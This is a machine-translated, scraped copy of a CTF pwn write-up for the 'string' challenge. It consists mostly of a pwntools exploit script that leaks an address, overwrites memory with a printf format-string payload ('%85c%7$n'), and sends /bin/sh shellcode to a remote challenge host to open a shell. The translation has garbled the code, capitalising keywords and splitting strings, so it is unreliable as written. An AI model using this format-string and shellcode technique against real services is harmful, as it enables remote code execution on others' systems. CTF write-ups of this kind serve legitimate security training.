Offense and defense in the world | string

Others 2019-10-31 19:21:50 views: null 
encoding = UTF. 8-# 
#! usr / bin / Python 

from PWN Import * 
IO = Remote ( '111.198.29.45', 42643) 
io.recvuntil ( "Secret [0] IS") 
# recvuntil (some_string) until the received some_string 
v3_0_addr = int (io.recvuntil ( "\ n") [: - 1], 16) # print cv3 [0] address 
log.info ( "v3_0_addr:" + hex (v3_0_addr)) 

# enter sub_4000D72 () 
IO. recvuntil ( "BE Character's name:") 
io.sendline ( "123") 
# to enter sub_400A7D () 
io.recvuntil ( "East or up ?:") 
io.sendline ( "East") 

# to enter sub_400BB9 (): printf at format string vulnerability exists, use this to modify v3 [0] value is 85 
io.recvuntil ( "there (. 1), or Leave (0) ?:") 
io.sendline ( ". 1") 
io.recvuntil ( " 'Give me an address'")
io.sendline(str(v3_0_addr))
io.recvuntil("you wish is:")
io.sendline("%85c%7$n")
# Use * <a_number_of_chars>% <number> $ n * can be written corresponding to the first * <number> Location * argument is the number of characters before% output 
# as this question before by% 85c outputs 85 characters, then % 7 $ n with the parameters written in the seventh position of the 85 

# into the sub_400CA6 (): v1 is forced to turn to a function pointer and implemented, we pass a system () function to getshell 
context (OS = 'Linux ', arch =' amd64 ') # os setting parameter setting system for the target system linux, Arch set architecture AMD64 
shellcode = ASM (shellcraft.sh ()) # (generated shellcode attack failed, the use disassembled shellcode ) 
# (the shellcode = "\ X6a \ X3B \ X58 \ x99 \ X52 \ X48 \ xbb \ X2F \ X2F \ X62 \ X69 \ x6e \ X2F \ X73 \ X68 \ X53 \ X54 \ X5F \ X52 \ X57 \ X54 \ x5e \ X0F \ X05 ") 
# Note: master does not fail simply forgotten to context 
# shellcraft is a class to help generate shellcode shellcraft.sh ():. obtain the execution system (" / bin / sh " ) corresponding to the machine code assembler code 
io.recvuntil ( "the USE YOU SPELL") 
io.sendline (the shellcode) 
io.interactive ()

reference:

https://www.jianshu.com/p/457520f97a76

https://blog.csdn.net/qq_35495684/article/details/79583232

https://adworld.xctf.org.cn/task/writeup?type=pwn&id=5056&number=2&grade=0&page=1

https://www.jianshu.com/p/8322fa5dff22

Guess you like

Origin www.cnblogs.com/chrysanthemum/p/11772977.html
Recommended
Ranking
[Algorithm] greedy _ program scheduling issues
Spring 控制反转(IOC)
Data structure-6.6 figure
Indicates that the class or member method has abstract properties
Huawei v5 server installed Linux operating system
Postgresql source code analysis - creating ordinary tables
Chapter 10 Evaluation Classification Results
Cloud service Ubuntu 20.04 version uses Nginx to deploy static web pages
Java Exercise 17.1
Solve the problem that git cannot automatically push submission in IDEA Push failed: Failed with error: Could not read from remote repository.
Daily
More
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)

Code World

© 2018 codetd.com